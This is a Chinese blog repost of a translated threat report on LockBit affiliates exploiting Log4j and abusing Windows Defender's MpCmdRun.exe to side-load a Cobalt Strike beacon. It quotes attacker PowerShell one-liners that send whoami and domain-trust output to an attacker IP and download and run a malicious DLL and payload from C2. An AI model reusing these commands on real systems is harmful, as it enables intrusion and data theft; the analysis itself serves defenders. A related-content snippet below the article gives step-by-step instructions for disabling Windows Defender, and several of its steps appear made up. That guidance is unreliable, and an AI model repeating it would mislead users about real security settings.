依靠Windows Defender|LockBit勒索软件通过Microsoft安全工具侧面加载Cobalt Strike

声明
出品|知道创宇(ID:404实验室)

以下内容,来自知道创宇404实验室翻译组作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

前文

最近,LockBit受到了相当多的关注。上周,SentinelLabs报道了LockBit 3.0(又名LockBit Black),描述了这种日益流行的RaaS的最新迭代如何实现一系列反分析和反调试例程。我们的研究很快被其他报告类似发现的人跟进。

与此同时,早在4月份,SentinelLabs就报告了一家LockBit附属公司如何利用合法的VMware命令行工具VMwareXferlogs.exe来进行侧向加载Cobalt Strike。

在这篇文章中,我们将通过描述LockBit运营商或附属公司使用的另一种合法工具来追踪该事件,只是这次的问题工具属于安全工具:Windows Defender。在最近的调查中,我们发现黑客滥用Windows防御程序的命令行工具MpCmdRun.exe来解密和加载Cobalt Strike的有效载荷。

图片

概述

最初的目标泄露是通过针对未修补的VMWare Horizon服务器的Log4j漏洞发生的。攻击者使用此处记录的PowerShell代码修改了安装web shell的应用程序的Blast Secure Gateway组件。

一旦获得初始访问权限,黑客就执行一系列枚举命令,并试图运行多种开发后工具,包括Meterpreter、PowerShell Empire和一种侧载Cobalt Strike的新方法。

特别是在尝试执行Cobalt Strike时,我们观察到一个新的合法工具用于侧加载恶意DLL,它可以解密负载。

以前观察到的通过删除EDR/EPP的用户地挂钩、Windows事件跟踪和反恶意软件扫描接口来规避防御的技术也被观察到。

攻击链

图片

一旦攻击者通过Log4j漏洞获得初始访问权限,侦察就开始使用PowerShell执行命令,并通过对IP的POST base64编码请求过滤命令输出。侦察活动示例如下:

powershell -c curl -uri http://139.180.184[.]147:80 
met POST -Body ([System.Convert]
::ToBase64String
(([System.Text.Encoding]
::ASCII.GetBytes((whoami)))))
owershell -c curl -uri http://139.180.184[.]147:80 -
met POST -Body
([System.Convert]
::ToBase64String(([System.Text.Encoding]
::ASCII.GetBytes((nltest /domain_trusts)))
))

一旦攻击者获得足够的权限,他们就会尝试下载并执行多个攻击后有效载荷。

攻击者从其控制的C2下载恶意DLL、加密负载和合法工具:

powershell -c Invoke-WebRequest -uri 
http://45.32.108[.]
54:443/mpclient.dll -OutFile 
c:\windows\help\windows\mpclient.dll;
Invoke-WebRequest -uri 
http://45.32.108[.]54:443/c0000015.log -OutFile 
c:\windows\help\windows\c0000015.log;
Invoke-WebRequest -uri 
http://45.32.108[.]54:443/MpCmdRun.exe -OutFile 
c:\windows\help\windows\MpCmdRun.exe;
c:\windows\help\windows\MpCmdRun.exe

值得注意的是,攻击者利用合法的Windows Defender命令行工具MpCmdRun.exe来解密和加载Cobalt Strike有效载荷。

图片

我们还注意到用于下载Cobalt Strike有效载荷的IP地址和用于执行侦察的IP地址之间的相关性:在下载Cobalt Strike后不久,攻击者试图执行并将输出发送到以139开头的IP,如下面两个片段所示。

powershell -c Invoke-WebRequest -uri 
http://45.32.108[.]54:443/glib-2.0.dll -OutFile 
c:\users\public\glib-2.0.dll;
Invoke-WebRequest -uri 
http://45.32.108[.]54:443/c0000013.log -OutFile 
c:\users\public\c0000013.log;
Invoke-WebRequest -uri 
http://45.32.108[.]54:443/VMwareXferlogs.exe -OutFile 
c:\users\public\VMwareXferlogs.exe;
c:\users\public\VMwareXferlogs.exepowershell -c curl -uri 
http://139.180.184[.]147:80 
-met POST -Body ([System.Convert]::
ToBase64String(([System.Text.Encoding]
::ASCII.GetBytes((
c:\users\public\VMwareXferlogs.exe)))
))

与之前报告的 VMwareXferlogs.exe工具的侧加载相同的流程,MpCmd.exe被滥用来侧加载一个武器化的mpclient.dll,它从c0000015.log文件加载并解密Cobalt Strike信标。

因此,在攻击中使用的与使用Windows Defender命令行工具相关的组件有:

图片

总结

防御者需要警惕的是,LockBit勒索软件运营商和附属公司正在探索和利用新颖的离地攻击工具,以帮助他们加载Cobalt Strike信标和规避一些常见的EDR和传统的AV检测工具。

更重要的是,那些安全软件进行例外处理的工具,应接受仔细检查。像VMware和Windows Defender这样的产品在企业中非常普遍,如果被允许在安装的安全控制之外运行,它们对参与者的威胁会很大。

IoC

图片

欢迎关注长白山攻防实验室公众号
定期更新优质文章分享。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows DefenderWindows操作系统自带的防病毒和安全工具。它提供了一套完整的防护机制,包括实时保护、Automatic Sample Submission、Windows Hello等功能,可有效保护计算机免受恶意软件和网络攻击的侵害。然而,有时用户可能需要卸载Windows Defender,例如因为想安装其他第三方防病毒软件或出于其他个人原因。 想要卸载Windows Defender,可以按照以下步骤进行操作: 1. 打开Windows设置,方法是按下Win + I快捷键,或者点击“开始”菜单并选择“设置”。 2. 在设置窗口中,选择“更新和安全”。 3. 在左侧菜单中,选择“Windows 安全”。 4. 在右侧窗口中,找到并点击“打开Windows 安全中心”链接。 5. 在Windows安全中心窗口中,找到并点击“病毒和威胁防护设置”。 6. 在病毒和威胁防护设置窗口中,找到“实时保护”,点击右侧的“管理设置”。 7. 在实时保护设置窗口中,将实时保护开关关闭。 8. 关闭实时保护后,返回到病毒和威胁防护设置窗口,点击“查看防病毒和威胁防护历史记录”。 9. 在历史记录窗口中,找到“灾难恢复”选项,点击“清除”。 10. 清除灾难恢复后,返回病毒和威胁防护设置窗口,找到并点击“应用程序和浏览器控制”。 11. 在应用程序和浏览器控制窗口中,将“应用和文件检查”开关关闭。 12. 关闭应用和文件检查后,返回病毒和威胁防护设置窗口,点击“家庭网络”链接。 13. 在家庭网络窗口中,将“家庭网络”开关关闭。 完成以上步骤后,Windows Defender将被禁用。如果需要完全卸载Windows Defender,可以通过更改注册表或使用专门的卸载工具来进行操作。值得注意的是,禁用或卸载Windows Defender可能会导致计算机的安全性下降,因此在卸载之前应确保计算机上已安装其他有效的安全软件

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值